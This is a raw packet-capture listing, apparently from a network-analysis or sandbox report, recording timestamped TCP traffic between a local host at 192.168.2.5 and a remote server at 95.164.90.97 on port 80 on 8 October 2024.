Oct 8, 2024 20:47:24.783677101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.783747911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783756971 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783767939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783776999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.783790112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.783816099 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.816498995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.816541910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.816553116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.816590071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.816653967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.816663027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.816672087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.816683054 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.816689014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.816715956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.816838026 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.816848040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.816860914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.816883087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.816898108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.816993952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817003965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817013979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817023993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817035913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817061901 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817184925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817194939 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817203999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817215919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817218065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817241907 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817264080 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817380905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817390919 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817394972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817410946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817420006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817430019 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817434072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817435980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817444086 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817457914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817461014 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817476034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817490101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817766905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817776918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817807913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817884922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817893982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817903042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817914009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817924023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817929983 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817934036 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.817946911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.817964077 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818202972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818212986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818221092 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818232059 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818242073 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818248034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818252087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818262100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818263054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818270922 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818279028 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818280935 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818286896 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818303108 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818352938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818511009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818625927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818635941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818645000 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818654060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818662882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818670988 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818674088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818684101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818687916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818691969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818698883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818701029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818713903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818722963 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818749905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.818963051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818974972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.818984032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819000006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819024086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819135904 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819144011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819153070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819163084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819174051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819180965 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819185972 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819195986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819202900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819209099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819221020 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819235086 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819396973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819406033 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819431067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819453001 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819483042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819493055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819497108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819506884 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819516897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819528103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819530964 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819538116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819557905 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819576979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819865942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819875002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819885969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819895029 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819904089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819911003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819914103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819922924 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819932938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819941044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819942951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.819957018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819966078 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.819992065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.820276022 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820285082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820293903 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820302963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820312977 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820326090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.820328951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820339918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820349932 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820353985 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.820369005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.820384979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.820907116 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820916891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820928097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820936918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.820954084 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.820979118 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.821042061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.821050882 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.821059942 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.821070910 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.821082115 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.821106911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.821135998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.821146965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.821156979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.821168900 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.821197987 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.870229006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870270014 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870280027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870346069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.870398998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870409012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870418072 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870428085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870443106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.870476961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.870584011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870594025 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870603085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870615005 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870625019 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.870646000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.870666027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.870748997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870759010 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870769024 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.870795012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.870815992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.903471947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903541088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903579950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903633118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903669119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903671980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.903702021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903721094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.903754950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.903763056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903814077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903846979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903862000 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.903882027 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903896093 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.903918028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903934002 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.903951883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.903971910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.903999090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904004097 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904036999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904057026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904084921 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904089928 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904122114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904139042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904160023 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904174089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904196978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904211998 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904232979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904242992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904266119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904283047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904299021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904318094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904349089 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904355049 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904387951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904403925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904421091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904437065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904454947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904472113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904488087 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904504061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904525042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904540062 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904557943 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904576063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904597998 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904644012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904652119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904700041 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904706001 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904735088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904752016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904768944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904786110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904802084 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904815912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904839039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904858112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904872894 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904897928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904906034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904928923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904946089 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.904959917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.904973984 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905004025 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905014992 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905060053 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905092955 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905113935 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905126095 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905142069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905159950 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905177116 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905195951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905214071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905232906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905246973 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905266047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905281067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905293941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905316114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905328035 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905345917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905379057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905424118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905453920 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905477047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905486107 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905498981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905520916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905534029 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905554056 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905567884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905586958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905600071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905620098 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905631065 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905653954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905669928 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905685902 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905704021 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905719995 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905735970 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905755997 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905775070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905787945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905805111 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905822039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905838966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905858040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905870914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905886889 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905906916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905920982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905939102 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905956030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.905976057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.905993938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906006098 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906044960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906061888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906095028 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906116009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906128883 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906142950 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906177044 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906276941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906307936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906336069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906342030 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906354904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906374931 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906393051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906409979 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906419039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906455994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:24.906460047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906491041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:24.906507015 CEST	49755	80	192.168.2.5	95.164.90.97
